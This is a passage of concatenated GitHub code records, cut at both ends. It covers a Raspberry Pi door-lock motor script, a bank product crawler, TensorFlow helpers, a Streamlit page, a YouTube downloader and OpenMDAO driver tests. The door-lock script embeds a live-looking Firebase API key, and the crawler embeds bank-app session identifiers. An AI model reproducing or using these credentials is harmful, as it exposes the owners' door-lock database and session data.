gpio.OUT)\n\tgpio.setup(23, gpio.OUT)\n\tgpio.setup(24, gpio.OUT)\n\ndef forward(seconds):\n\t'''\n\tMoves the motor conntect to the controller board \"forward\".\n\n\tNOTE: forward is arbitrary and depends on the connection of the + and -\n\tleads\n\n\t:param seconds: The number of seconds to sleep\n\n\t'''\n\tinit()\n\tgpio.output(17, True)\n\tgpio.output(22, False)\n\tgpio.output(23, True)\n\tgpio.output(24, False)\n\ttime.sleep(seconds)\n\tgpio.cleanup()\n\ndef backward(seconds):\n\t'''\n\tMoves the motor conntect to the controller board \"backward\".\n\n\tNOTE: backward is arbitrary and depends on the connection of the + and -\n\tleads\n\n\t:param seconds: The number of seconds to sleep\n\n\t'''\n\n\tinit()\n\tgpio.output(17, False)\n\tgpio.output(22, True)\n\tgpio.output(23, False)\n\tgpio.output(24, True)\n\ttime.sleep(seconds)\n\tgpio.cleanup()\n\n# Configuration settings for Firebase\n# These settings determine which 
database is connected\nconfig = {\n\t\"apiKey\": \"AIzaSyC3tcDJPD4nXPslkhZ7gscE8p9Im4Gw00s\",\n\t\"authDomain\": \"easy-lock.firebaseapp.com\",\n \t\"databaseURL\": \"https://easy-lock.firebaseio.com/\",\n \t\"storageBucket\": \"easy-lock.appspot.com\"\n}\n\nfirebase = pyrebase.initialize_app(config)\t# initialize the firebase variable\ndb = firebase.database()\t\t\t\t\t# initialize the Firebase database\nstorage = firebase.storage()\t\t\t\t# initialize the storage database\n\ndef stream_handler(data):\n\t'''\n\tHandles the data stream from Firebase. Locks and unlocks the door.\n\n\t:param message: the data from Firebase\n\n\t'''\n\n\tprint(data[\"path\"])\n\tprint(data[\"data\"])\n\tprint(data[\"event\"])\n\tif data[\"event\"] == 'patch':\n\t\tif data[\"data\"].get(\"status\", None) is True:\n\t\t\tbackward(2.5) # lock door, less than unlock to fix mechanical bug\n\t\telse:\n\t\t\tforward(2.7) # unlock door\n\n\n\n\nlock_firebase_stream = db.child(\"doors/door1\").stream(stream_handler)\n","repo_name":"PoeticPete/RaspberryPiMotor","sub_path":"pi.py","file_name":"pi.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70181708292","text":"def checker(reg, words):\n answer = 0\n direction, reg = reg\n for word in words:\n if len(reg) != len(word):\n continue\n same = False\n if direction == 'f':\n i = len(reg)\n while i >= 0:\n i -= 1\n if reg[i] == word[i]:\n continue\n\n if reg[i] == '?':\n same = True\n break\n break\n if same:\n answer += 1\n else:\n for a, b in zip(reg, word):\n if a == b:\n continue\n if a == '?':\n same = True\n break\n break\n\n if same:\n answer += 1\n return answer\n\ndef solution(words, queries):\n answer = []\n\n new_queries = list()\n for q in queries:\n if q[0] == '?':\n new_queries.append(('f', q))\n else:\n new_queries.append(('b', q))\n\n for reg in new_queries:\n answer.append(checker(reg, words))\n\n return answer\n\nprint(solution(\n [\"frodo\", \"front\", \"frost\", \"frozen\", \"frame\", \"kakao\"],\n [\"fro??\", \"????o\", \"fr???\", \"fro???\", \"pro?\"]\n))","repo_name":"yusong-offx/study-problems","sub_path":"problem/tmp2.py","file_name":"tmp2.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3827973346","text":"import json\nfrom typing import List\nfrom requests import Response\nfrom utils.crawl_request import AbstractCrawlRequest\nfrom utils.db_utils import getLocalDate\nfrom utils.mappings import FIELD_MAPPINGS\n\n\nclass GfyhCrawlRequest(AbstractCrawlRequest):\n def _prep_request(self):\n response = self.session.request(\n method='post',\n url='https://wap.cgbchina.com.cn/h5-mobilebank-app/noSessionServlet/hbss/fn10026.lgx',\n json={\"body\": {\"channel\": \"400\", \"sChannel\": \"WX\", \"prdType\": \"1\"},\n \"header\": {\"senderSN\": \"1663749151603n1009431\", \"os\": \"Win32\",\n \"channel\": \"WX\", \"secondChannel\": \"\", \"scope\": \"2\",\n \"mpSId\": \"HMBS_C882C49E556385209F40A14EC9972733_1551629178531586048\",\n \"utmSource\": \"\"}},\n headers={\"host\": \"wap.cgbchina.com.cn\",\n \"accept\": \"application/json, text/plain, */*\",\n \"origin\": \"https//wap.cgbchina.com.cn\",\n \"sendersn\": \"1663749151603n1009431\",\n \"user-agent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x6307062c)\",\n 
\"content-type\": \"application/json;charset=UTF-8\",\n \"sec-fetch-site\": \"same-origin\",\n \"sec-fetch-mode\": \"cors\",\n \"sec-fetch-dest\": \"empty\",\n \"referer\": \"https//wap.cgbchina.com.cn/h5-mobilebank-web/h5/investment/self/list?srcChannel=WX&secondaryChannel=WX&mainChannel=400&tab=1&srcScene=GFYHGZH&channel=400&sChannel=MB&faceFlag=LS&isRegistCS=1&HMBA_STACK_HASH=1663748433050\",\n \"accept-encoding\": \"gzip, deflate, br\",\n \"accept-language\": \"zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7\"}\n )\n loads = json.loads(response.text\n .encode(response.encoding)\n .decode('utf-8', errors='ignore')\n if response.encoding\n else response.text)['body']\n for k, v in loads.items():\n if k not in self.field_value_mapping.keys():\n k = k[:-4]\n self.field_value_mapping[k] = {}\n for item in v:\n if k == 'curType':\n self.field_value_mapping[k][item['curType']] = item['curTypeName']\n elif k == 'expireType':\n self.field_value_mapping[k][item['expireType']] = item['expireTypeName']\n elif k == 'firstAmt':\n self.field_value_mapping[k][item['firstAmt']] = item['firstAmtName']\n elif k == 'investManager':\n self.field_value_mapping[k][item['investManagerNo']] = item['investManagerName']\n elif k == 'prdLimit':\n self.field_value_mapping[k][item['limitTime']] = item['limitTimeName']\n elif k == 'prdSellStatus':\n self.field_value_mapping[k][item['prdSellStatus']] = item['prdSellStatusName']\n elif k == 'riskLevel':\n self.field_value_mapping[k][item['riskLevel']] = item['riskLevelName']\n self._prep_request_flag = True\n\n def _parse_response(self, response: Response) -> List[dict]:\n resp_str = response.text.encode(response.encoding).decode('utf-8') if response.encoding else response.text\n return json.loads(resp_str)['body']['list']\n\n def _row_processor(self, row: dict) -> dict:\n return row\n\n def _if_end(self, response: Response) -> bool:\n parse_response = self._parse_response(response)\n if len(parse_response) == 0:\n return True\n\n def _row_post_processor(self, row: dict) -> dict:\n if {'yieldName', 'yieldName2', 'yieldVal2'}.issubset(row.keys()):\n if row['yieldName'] != '单位净值':\n row['yjbjjz'] = json.dumps({\n 'title': row['yieldName'],\n 'value': row['yieldVal2']\n }).encode().decode('unicode_escape')\n else:\n row['yjbjjz'] = json.dumps({\n 'title': '预期收益率',\n 'value': row['yieldVal2']\n }).encode().decode('unicode_escape')\n for key in {'yieldName', 'yieldName2', 'yieldVal2'}:\n if key in row.keys():\n del row[key]\n row['logId'] = self.log_id\n row['createTime'] = getLocalDate()\n row['crawl_from'] = 'mobile'\n if 'cpbm' not in row.keys():\n row['cpbm'] = row['cpmc']\n return row\n\n def get_json(self, page_no: int):\n return {\n \"body\": {\n \"beginNum\": (page_no - 1) * 20,\n \"fetchNum\": 20,\n \"channel\": \"400\",\n \"sChannel\": \"WX\",\n \"structDepPrdFlag\": \"N\",\n \"tagflagNew\": None,\n \"prdCycle\": \"\",\n \"firstAmt\": \"\",\n \"sortFlag\": \"0\",\n \"curType\": \"\",\n \"riskLevel\": \"\",\n \"prdManagerList\": [],\n \"expireType\": \"\",\n \"prdSellStatus\": \"\"\n },\n \"header\": {\n \"senderSN\": \"1663749151600n2005493\",\n \"os\": \"Win32\",\n \"channel\": \"WX\",\n \"secondChannel\": \"\",\n \"scope\": \"2\",\n \"mpSId\": \"HMBS_C882C49E556385209F40A14EC9972733_1551629178531586048\",\n \"utmSource\": \"\"\n }\n }\n\n def _next_request(self):\n # 需要记录一个递增的变量\n if 'page_no' not in self.kwargs.keys():\n self.kwargs['page_no'] = 1\n else:\n self.kwargs['page_no'] += 1\n self.request['json'] = self.get_json(self.kwargs['page_no'])\n\n\ngfyh_crawl_mobile = 
GfyhCrawlRequest(\n # 请求参数\n request={\n 'url': 'https://wap.cgbchina.com.cn/h5-mobilebank-app/noSessionServlet/hbss/fn20027.lgx',\n 'headers': {\n 'host': 'wap.cgbchina.com.cn',\n # 'content-length': 424,\n 'accept': 'application/json, text/plain, */*',\n 'origin': 'https://wap.cgbchina.com.cn',\n 'sendersn': '1663749151600n2005493',\n 'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x6307062c)',\n 'content-type': 'application/json;charset=UTF-8',\n 'sec-fetch-site': 'same-origin',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-dest': 'empty',\n 'referer': 'https://wap.cgbchina.com.cn/h5-mobilebank-web/h5/investment/self/list?srcChannel=WX&secondaryChannel=WX&mainChannel=400&tab=1&srcScene=GFYHGZH&channel=400&sChannel=MB&faceFlag=LS&isRegistCS=1&HMBA_STACK_HASH=1663748433050',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7',\n },\n 'method': 'post'\n },\n identifier='gfyh',\n field_value_mapping={\n 'issPrice': lambda x: str(x) + '元',\n 'prdAttr': lambda x: '非保本浮动收益类' if str(x) == \"1\" else '保本浮动收益类'\n },\n field_name_2_new_field_name={\n 'prdName': FIELD_MAPPINGS['产品名称'],\n 'prdName2': FIELD_MAPPINGS['产品简称'],\n 'prdCode': FIELD_MAPPINGS['产品编码'],\n 'tACode': FIELD_MAPPINGS['TA编码'],\n 'tAName': FIELD_MAPPINGS['TA名称'],\n 'riskLevel': FIELD_MAPPINGS['风险等级'],\n 'investManagerName': FIELD_MAPPINGS['管理人'],\n 'issPrice': FIELD_MAPPINGS['发行价'],\n 'iPOEndDate': FIELD_MAPPINGS['募集结束日期'],\n 'iPOStartDate': FIELD_MAPPINGS['募集起始日期'],\n 'estabDate': FIELD_MAPPINGS['产品起始日期'],\n 'endDate': FIELD_MAPPINGS['产品结束日期'],\n 'curType': FIELD_MAPPINGS['币种'],\n 'nAV': FIELD_MAPPINGS['净值'],\n 'nAVDate': FIELD_MAPPINGS['净值日期'],\n 'totLimitStr': FIELD_MAPPINGS['总额度'],\n 'yieldName': 'yieldName',\n 'yieldName2': 'yieldName2',\n 'yieldVal2': 'yieldVal2'\n },\n check_props=['logId', 'cpbm']\n)\n\n__all__ = ['gfyh_crawl_mobile']\n","repo_name":"wuyiping2019/kb_graph_sync","sub_path":"广发银行/gfyh_mobile.py","file_name":"gfyh_mobile.py","file_ext":"py","file_size_in_byte":8448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20943173669","text":"from __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport numpy as np\nimport tensorflow as tf\n\nimport logger\n\nlog = logger.get()\n\n\n\n\ndef weight_variable(shape,\n init_method=None,\n dtype=tf.float32,\n init_param=None,\n wd=None,\n name=None,\n trainable=True,\n seed=0):\n \"\"\"Declares a variable.\n\n Args:\n shape: Shape of the weights, list of int.\n init_method: Initialization method, \"constant\" or \"truncated_normal\".\n init_param: Initialization parameters, dictionary.\n wd: Weight decay, float.\n name: Name of the variable, str.\n trainable: Whether the variable can be trained, bool.\n\n Returns:\n var: Declared variable.\n \"\"\"\n if dtype != tf.float32:\n log.warning(\"Not using float32, currently using {}\".format(dtype))\n if init_method is None:\n initializer = tf.zeros_initializer(shape, dtype=dtype)\n elif init_method == \"truncated_normal\":\n if \"mean\" not in init_param:\n mean = 0.0\n else:\n mean = init_param[\"mean\"]\n if \"stddev\" not in init_param:\n stddev = 0.1\n else:\n stddev = init_param[\"stddev\"]\n log.info(\"Normal initialization std {:.3e}\".format(stddev))\n initializer = tf.truncated_normal_initializer(\n mean=mean, stddev=stddev, seed=seed, 
dtype=dtype)\n elif init_method == \"uniform_scaling\":\n if \"factor\" not in init_param:\n factor = 1.0\n else:\n factor = init_param[\"factor\"]\n log.info(\"Uniform initialization scale {:.3e}\".format(factor))\n initializer = tf.uniform_unit_scaling_initializer(\n factor=factor, seed=seed, dtype=dtype)\n elif init_method == \"constant\":\n if \"val\" not in init_param:\n value = 0.0\n else:\n value = init_param[\"val\"]\n initializer = tf.constant_initializer(value=value, dtype=dtype)\n elif init_method == \"xavier\":\n initializer = tf.contrib.layers.xavier_initializer(\n uniform=False, seed=seed, dtype=dtype)\n else:\n raise ValueError(\"Non supported initialization method!\")\n try:\n shape_int = [int(ss) for ss in shape]\n log.info(\"Weight shape {}\".format(shape_int))\n except:\n pass\n if wd is not None:\n if wd > 0.0:\n reg = lambda x: tf.multiply(tf.nn.l2_loss(x), wd)\n log.info(\"Weight decay {}\".format(wd))\n else:\n log.warning(\"No weight decay\")\n reg = None\n else:\n log.warning(\"No weight decay\")\n reg = None\n var = tf.get_variable(\n name,\n shape,\n initializer=initializer,\n regularizer=reg,\n dtype=dtype,\n trainable=trainable)\n log.info(\"Initialized weight {}\".format(var.name))\n return var\n\n\ndef weight_variable_cpu(shape,\n init_method=None,\n dtype=tf.float32,\n init_param=None,\n wd=None,\n name=None,\n trainable=True,\n seed=0):\n \"\"\"Declares variables on CPU.\"\"\"\n with tf.device(\"/cpu:0\"):\n return weight_variable(\n shape,\n init_method=init_method,\n dtype=dtype,\n init_param=init_param,\n wd=wd,\n name=name,\n trainable=trainable,\n seed=seed)\n\n\ndef batch_norm(x,\n is_training,\n gamma=None,\n beta=None,\n # axes=[0, 1, 2],\n axes=[0],\n eps=1e-10,\n name=\"bn_out\",\n decay=0.99,\n dtype=tf.float32):\n \"\"\"Applies batch normalization.\n Collect mean and variances on x except the last dimension. 
And apply\n normalization as below:\n x_ = gamma * (x - mean) / sqrt(var + eps) + beta\n\n Args:\n x: Input tensor, [B, ...].\n n_out: Integer, depth of input variable.\n gamma: Scaling parameter.\n beta: Bias parameter.\n axes: Axes to collect statistics.\n eps: Denominator bias.\n\n Returns:\n normed: Batch-normalized variable.\n mean: Mean used for normalization (optional).\n \"\"\"\n n_out = x.get_shape()[-1]\n try:\n n_out = int(n_out)\n shape = [n_out]\n except:\n shape = None\n emean = tf.get_variable(\n \"ema_mean\",\n shape=shape,\n trainable=False,\n dtype=dtype,\n initializer=tf.constant_initializer(\n 0.0, dtype=dtype))\n evar = tf.get_variable(\n \"ema_var\",\n shape=shape,\n trainable=False,\n dtype=dtype,\n initializer=tf.constant_initializer(\n 1.0, dtype=dtype))\n if is_training:\n mean, var = tf.nn.moments(x, axes, name=\"moments\")\n ema_mean_op = tf.assign_sub(emean, (emean - mean) * (1 - decay))\n ema_var_op = tf.assign_sub(evar, (evar - var) * (1 - decay))\n normed = tf.nn.batch_normalization(\n x, mean, var, beta, gamma, eps, name=name)\n return normed, [ema_mean_op, ema_var_op]\n else:\n normed = tf.nn.batch_normalization(\n x, emean, evar, beta, gamma, eps, name=name)\n return normed, None\n","repo_name":"skywaLKer518/MultiplicativeMultimodal","sub_path":"higgs/network_var.py","file_name":"network_var.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"44"} +{"seq_id":"18325919248","text":"import streamlit as st\nimport os\nfrom PIL import Image\nfrom utils import consumer_expenditure_row as cer\n\nscript_dir = os.path.dirname(__file__) # 현재 스크립트 파일의 디렉토리 경로\nimage_dir = os.path.join(script_dir, 'picture') # 상위 디렉토리의 image 폴더 경로\n\nspend_image1 = Image.open(os.path.join(image_dir, 'spend1.png'))\n\ndef spend():\n st.write('\\n')\n st.write('\\n')\n st.subheader('4개년도 분기별 가계 소비지출 현황')\n st.write('분기별 가계 소비지출 현황데이터는 Kosis 포털에서 csv파일을 다운받아 사용하였습니다.')\n st.write(f'Kosis 가구당 월평균 가계수지: https://kosis.kr/statHtml/statHtml.do?orgId=101&tblId=DT_1L9U001&vw_cd=MT_ZTITLE&list_id=G_A_10_003_001&seqNo=&lang_mode=ko&language=kor&obj_var_id=&itm_id=&conn_path=MT_ZTITLE')\n st.write('\\n')\n st.write('\\n')\n st.write('<b>1. 데이터를 csv파일로 다운</b>', unsafe_allow_html=True)\n st.image(spend_image1)\n st.write('csv로 받은 파일에서 필요한 데이터를 확인합니다. 코로나 전후 가계당 소비가 줄었는지 늘었는지 비교하기 위해'\n '전체가구를 기준으로 소비지출 데이터만 추출할 예정입니다. ')\n\n st.write('\\n')\n st.write('\\n')\n st.write('<b>2. 데이터 전처리</b>', unsafe_allow_html=True)\n cer.spend_pd()\n\n\n st.write('월평균 가계수지 데이터는 열에 전체가구, 근로가구, 근로외 가구가 나뉘어져있는데 '\n '전반적인 소비패턴을 파악하기 위해 전체가구에서 추출하였습니다. 
이렇게 추출한 데이터로 matplotlib을 사용하여 그래프를 그려주었습니다.')\n\n\n","repo_name":"Kwon-JiHyeon/Covid-19_Change_in_Consumption_Patterns","sub_path":"utils/consumer_expenditure_utils.py","file_name":"consumer_expenditure_utils.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"69996955652","text":"from pytube import YouTube\r\nfrom tkinter import Tk, Label, Entry, Button, StringVar, messagebox, filedialog, PhotoImage\r\nfrom threading import Thread\r\nfrom fpdf import FPDF\r\nimport os\r\nimport pytube\r\n\r\n\r\nclass YouTubeDownloader:\r\n def __init__(self, root):\r\n self.root = root\r\n self.root.title(\"[TEST FOR LEARNING]YouTube Downloader\")\r\n\r\n self.logo_image_yt = PhotoImage(file=\"logos/youtube.png\")\r\n self.logo_label_1 = Label(root, image=self.logo_image_yt)\r\n self.logo_label_1.pack()\r\n\r\n self.url_label = Label(root, text=\"YouTube URL:\")\r\n self.url_label.pack()\r\n\r\n self.url_var = StringVar()\r\n self.url_entry = Entry(root, textvariable=self.url_var, width=75)\r\n self.url_entry.pack()\r\n\r\n self.logo_image_drctry = PhotoImage(file=\"logos/folder.png\")\r\n self.logo_label_2 = Label(root, image=self.logo_image_drctry)\r\n self.logo_label_2.pack()\r\n\r\n self.directory_label = Label(root, text=\"Save Directory:\")\r\n self.directory_label.pack()\r\n\r\n self.directory_var = StringVar()\r\n self.directory_entry = Entry(root, textvariable=self.directory_var, width=75)\r\n self.directory_entry.pack()\r\n\r\n self.browse_button = Button(root, text=\"Save\", command=self.browse_directory)\r\n self.browse_button.pack()\r\n\r\n self.download_button = Button(root, text=\"Download\", command=self.download)\r\n self.download_button.pack()\r\n\r\n def browse_directory(self):\r\n selected_dir = filedialog.askdirectory()\r\n self.directory_var.set(selected_dir)\r\n\r\n def download(self):\r\n url = self.url_var.get()\r\n save_dir = self.directory_var.get()\r\n\r\n if not url or not save_dir:\r\n messagebox.showerror(\"Error: \", \"Please, provide URL and save directory!\")\r\n return\r\n\r\n try:\r\n youtube = pytube.YouTube(url)\r\n video_stream = youtube.streams.get_highest_resolution()\r\n\r\n def format_video_length(length_in_seconds):\r\n hours, remainder = divmod(length_in_seconds, 3600)\r\n minutes, seconds = divmod(remainder, 60)\r\n return f\"{hours:02}:{minutes:02}:{seconds:02}\"\r\n\r\n def format_view_count(views):\r\n if views >= 1000000:\r\n return f\"{views // 1000000} Million {views % 1000000 // 1000} Thousand {views % 1000} times\"\r\n elif views >= 1000:\r\n return f\"{views // 1000} Thousand {views % 1000} times\"\r\n else:\r\n return f\"{views} times\"\r\n\r\n def download_thread():\r\n try:\r\n video_stream.download(output_path=save_dir)\r\n messagebox.showinfo(\"Success!\", \"Download Complete!\")\r\n\r\n video_info = {\r\n \"Video Title\": youtube.title,\r\n \"Video Owner\": youtube.author,\r\n \"Thumbnail Image\": youtube.thumbnail_url,\r\n \"Video Description\": youtube.description,\r\n \"Video Length\": format_video_length(youtube.length),\r\n \"Video Rating\": youtube.rating,\r\n \"View Count\": format_view_count(youtube.views)\r\n }\r\n\r\n pdf = FPDF()\r\n pdf.add_page()\r\n pdf.set_font(\"Arial\", size=12)\r\n pdf.cell(200, 10, \"Video Metadata\", ln=True, align=\"C\")\r\n pdf.ln(10)\r\n for key, value in video_info.items():\r\n pdf.cell(0, 10, f\"{key}: {value}\", ln=True)\r\n pdf_file_path = os.path.join(save_dir, 
f\"{youtube.title}_metadata.pdf\")\r\n pdf.output(pdf_file_path)\r\n\r\n messagebox.showinfo(\"Success!\", \"Download, Metadata Extraction, and Subtitles Extraction Complete!\")\r\n\r\n self.url_var.set('')\r\n self.directory_var.set('')\r\n\r\n except Exception as e:\r\n messagebox.showerror(\"Error: \", f\"An Error Occurred: {str(e)}\")\r\n\r\n download_thread_instance = Thread(target=download_thread)\r\n download_thread_instance.start()\r\n\r\n except Exception as e:\r\n messagebox.showerror(\"Error: \", f\"An Error Occurred: {str(e)}\")\r\n\r\n\r\ndef main():\r\n root = Tk()\r\n app = YouTubeDownloader(root)\r\n root.mainloop()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"tnctungkl/yt_downloader_for_training_test","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"72808551812","text":"\"\"\" Test for the Driver class -- basic driver interface.\"\"\"\n\nfrom pprint import pformat\nimport unittest\nimport warnings\n\nimport numpy as np\n\nfrom openmdao.api import ExecComp, IndepVarComp, Component, Driver, Group, Problem\nfrom openmdao.drivers.scipy_optimizer import ScipyOptimizer\nfrom openmdao.test.util import assert_rel_error\nfrom openmdao.test.paraboloid import Paraboloid\nfrom openmdao.test.simple_comps import ArrayComp2D\nfrom openmdao.test.sellar import SellarDerivatives\nfrom openmdao.util.options import OptionsDictionary\nfrom openmdao.util.record_util import create_local_meta, update_local_meta\n\n\nclass MySimpleDriver(Driver):\n\n def __init__(self):\n super(MySimpleDriver, self).__init__()\n\n # What we support\n self.supports['inequality_constraints'] = True\n self.supports['equality_constraints'] = False\n self.supports['linear_constraints'] = False\n self.supports['multiple_objectives'] = False\n\n # My driver options\n self.options = OptionsDictionary()\n self.options.add_option('tol', 1e-4)\n self.options.add_option('maxiter', 10)\n\n self.alpha = .01\n self.violated = []\n\n def run(self, problem):\n \"\"\" Mimic a very simplistic unconstrained optimization.\"\"\"\n\n # Get dicts with pointers to our vectors\n params = self.get_desvars()\n objective = self.get_objectives()\n constraints = self.get_constraints()\n\n indep_list = params.keys()\n objective_names = list(objective.keys())\n constraint_names = list(constraints.keys())\n unknown_list = objective_names + constraint_names\n\n itercount = 0\n while itercount < self.options['maxiter']:\n\n # Run the model\n problem.root.solve_nonlinear()\n #print('z1: %f, z2: %f, x1: %f, y1: %f, y2: %f' % (problem['z'][0],\n #problem['z'][1],\n #problem['x'],\n #problem['y1'],\n #problem['y2']))\n #print('obj: %f, con1: %f, con2: %f' % (problem['obj'], problem['con1'],\n #problem['con2']))\n\n # Calculate gradient\n J = problem.calc_gradient(indep_list, unknown_list, return_format='dict')\n\n objective = self.get_objectives()\n constraints = self.get_constraints()\n\n for key1 in objective_names:\n for key2 in indep_list:\n\n grad = J[key1][key2] * objective[key1]\n new_val = params[key2] - self.alpha*grad\n\n # Set parameter\n self.set_desvar(key2, new_val)\n\n self.violated = []\n for name, val in constraints.items():\n if np.linalg.norm(val) > 0.0:\n self.violated.append(name)\n\n itercount += 1\n\n\nclass Rosenbrock(Component):\n def __init__(self, size=2):\n super(Rosenbrock, self).__init__()\n self.add_param('x', val=np.zeros(size))\n self.add_output('f', 
val=0.0)\n self.add_output('xxx', val=np.zeros(size))\n\n def solve_nonlinear(self, params, unknowns, resids):\n\n unknowns['f'] = rosen(params['x'])\n\n\nclass ScaleAddDriver(Driver):\n\n def run(self, problem):\n \"\"\" Save away scaled info.\"\"\"\n\n self._problem = problem\n self.metadata = create_local_meta(None, 'test')\n self.iter_count = 0\n update_local_meta(self.metadata, (self.iter_count,))\n\n params = self.get_desvars()\n param_meta = self.get_desvar_metadata()\n\n self.set_desvar('x', 0.5)\n problem.root.solve_nonlinear()\n\n objective = self.get_objectives()\n constraint = self.get_constraints()\n\n # Stuff we saved should be in the scaled coordinates.\n self.param = params['x']\n self.obj_scaled = objective['f_xy']\n self.con_scaled = constraint['con']\n self.param_high = param_meta['x']['upper']\n self.param_low = param_meta['x']['lower']\n\n\nclass ScaleAddDriverArray(Driver):\n\n def run(self, problem):\n \"\"\" Save away scaled info.\"\"\"\n\n self._problem = problem\n self.metadata = create_local_meta(None, 'test')\n self.iter_count = 0\n update_local_meta(self.metadata, (self.iter_count,))\n\n params = self.get_desvars()\n param_meta = self.get_desvar_metadata()\n\n self.set_desvar('x', np.array([22.0, 404.0, 9009.0, 121000.0]))\n problem.root.solve_nonlinear()\n\n objective = self.get_objectives()\n constraint = self.get_constraints()\n\n # Stuff we saved should be in the scaled coordinates.\n self.param = params['x']\n self.obj_scaled = objective['y']\n self.con_scaled = constraint['con']\n self.param_low = param_meta['x']['lower']\n\n\nclass TestDriver(unittest.TestCase):\n\n def test_mydriver(self):\n\n prob = Problem()\n root = prob.root = SellarDerivatives()\n\n prob.driver = MySimpleDriver()\n prob.driver.add_desvar('z', lower=-100.0, upper=100.0)\n\n prob.driver.add_objective('obj')\n prob.driver.add_constraint('con1', upper=0.0)\n prob.driver.add_constraint('con2', upper=0.0)\n\n prob.setup(check=False)\n prob.run()\n\n obj = prob['obj']\n self.assertLess(obj, 28.0)\n\n def test_scaler_adder(self):\n\n prob = Problem()\n root = prob.root = Group()\n driver = prob.driver = ScaleAddDriver()\n\n root.add('p1', IndepVarComp([('x',60000.0,{'desc':'my x'}),\n ('y',60000.0,{'desc':'my y'})]), promotes=['*'])\n root.add('comp', Paraboloid(), promotes=['*'])\n root.add('constraint', ExecComp('con=f_xy + x + y'), promotes=['*'])\n\n driver.add_desvar('x', lower=59000.0, upper=61000.0, adder=-60000.0, scaler=1/1000.0)\n driver.add_objective('f_xy', adder=-10890367002.0, scaler=1.0/20)\n driver.add_constraint('con', upper=0.0, adder=-10890487502.0, scaler=1.0/20)\n\n prob.setup(check=False)\n prob.run()\n\n self.assertEqual(driver.param_high, 1.0)\n self.assertEqual(driver.param_low, -1.0)\n self.assertEqual(driver.param, 0.0)\n self.assertEqual(prob['x'], 60500.0)\n self.assertEqual(driver.obj_scaled[0], 1.0)\n self.assertEqual(driver.con_scaled[0], 1.0)\n\n def test_scaler_adder_int(self):\n\n prob = Problem()\n root = prob.root = Group()\n driver = prob.driver = ScaleAddDriver()\n\n root.add('p1', IndepVarComp([('x',12.0,{'desc':'my x'}),\n ('y',13.0,{'desc':'my y'})]), promotes=['*'])\n root.add('comp', Paraboloid(), promotes=['*'])\n root.add('constraint', ExecComp('con=f_xy + x + y'), promotes=['*'])\n\n driver.add_desvar('x', adder=-10, scaler=20.0)\n driver.add_objective('f_xy', adder=-10, scaler=20)\n driver.add_constraint('con', upper=0, adder=-10, scaler=20)\n\n prob.setup(check=False)\n prob.run()\n\n self.assertEqual(driver.param, 40.0)\n 
self.assertEqual(prob['x'], 10.025)\n assert_rel_error(self, driver.obj_scaled[0], 9113.5125, 1e-6)\n assert_rel_error(self, driver.con_scaled[0], 9574.0125, 1e-6)\n\n J = driver.calc_gradient(['x', 'y'], ['f_xy'])\n assert_rel_error(self, J[0][0], 27.05, 1e-6)\n assert_rel_error(self, J[0][1], 880.5, 1e-6)\n\n def test_scaler_adder_array(self):\n\n prob = Problem()\n root = prob.root = Group()\n driver = prob.driver = ScaleAddDriverArray()\n\n root.add('p1', IndepVarComp('x', val=np.array([[1.0, 1.0], [1.0, 1.0]])),\n promotes=['*'])\n root.add('comp', ArrayComp2D(), promotes=['*'])\n root.add('constraint', ExecComp('con = x + y',\n x=np.array([[1.0, 1.0], [1.0, 1.0]]),\n y=np.array([[1.0, 1.0], [1.0, 1.0]]),\n con=np.array([[1.0, 1.0], [1.0, 1.0]])),\n promotes=['*'])\n\n driver.add_desvar('x', lower=np.array([[-1e5, -1e5], [-1e5, -1e5]]),\n upper=np.array([1e25, 1e25, 1e25, 1e25]),\n adder=np.array([[10.0, 100.0], [1000.0, 10000.0]]),\n scaler=np.array([[1.0, 2.0], [3.0, 4.0]]))\n driver.add_objective('y', adder=np.array([[10.0, 100.0], [1000.0, 10000.0]]),\n scaler=np.array([[1.0, 2.0], [3.0, 4.0]]))\n driver.add_constraint('con', upper=np.zeros((2, 2)), adder=np.array([[10.0, 100.0], [1000.0, 10000.0]]),\n scaler=np.array([[1.0, 2.0], [3.0, 4.0]]))\n\n prob.setup(check=False)\n prob.run()\n\n self.assertEqual(driver.param[0], 11.0)\n self.assertEqual(driver.param[1], 202.0)\n self.assertEqual(driver.param[2], 3003.0)\n self.assertEqual(driver.param[3], 40004.0)\n self.assertEqual(prob['x'][0, 0], 12.0)\n self.assertEqual(prob['x'][0, 1], 102.0)\n self.assertEqual(prob['x'][1, 0], 2003.0)\n self.assertEqual(prob['x'][1, 1], 20250.0)\n self.assertEqual(driver.obj_scaled[0], (prob['y'][0, 0] + 10.0)*1.0)\n self.assertEqual(driver.obj_scaled[1], (prob['y'][0, 1] + 100.0)*2.0)\n self.assertEqual(driver.obj_scaled[2], (prob['y'][1, 0] + 1000.0)*3.0)\n self.assertEqual(driver.obj_scaled[3], (prob['y'][1, 1] + 10000.0)*4.0)\n self.assertEqual(driver.param_low[0], (-1e5 + 10.0)*1.0)\n self.assertEqual(driver.param_low[1], (-1e5 + 